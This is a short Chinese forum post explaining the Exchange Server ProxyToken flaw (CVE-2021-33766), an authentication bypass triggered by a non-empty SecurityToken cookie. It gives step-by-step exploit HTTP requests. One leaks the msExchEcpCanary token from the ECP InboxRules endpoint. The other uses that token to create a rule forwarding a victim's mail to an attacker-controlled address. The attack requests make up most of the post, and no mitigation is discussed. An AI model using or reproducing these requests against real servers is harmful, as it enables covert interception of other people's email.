ExchangeServer email窃听漏洞-PROXYTOKEN (CVE-2021-33766)
漏洞原因:漏洞出现在“委托身份验证”的功能中,如果前端header中存在非空的SecurityToken的Cookie时,就会直接请求后端服务,不会加载委托认证的模块(DelegatedAuthModule)。
1. 向受目标服务器请求poc泄露msExchEcpCanary
POST /ecp/test1@test.com/RulesEditor/InboxRules.svc/NewObject
...
Cookie: SecurityToken=x
...
2. 在response 500 错误的header中找到msExchEcpCanary
3. 使用 msExchEcpCanary 值代入,请求设置转发规则
POST /ecp/RulesEditor/InboxRules.svc/NewObject?msExchEcpCanary=$token
...
Cookie: SecurityToken=x
...
{"properties":{"ForwardTo":[{"RawIdentity":"myemail@test.com","DisplayName":"myemail","Address":"myemail@test.com","AddressOrigin":3,"RecipientFlag":0,"RoutingType":"SMTP","SMTPAddress":"myemail@test.com"}],"Name":"test","StopProcessingRules":"true"}}
页:
[1]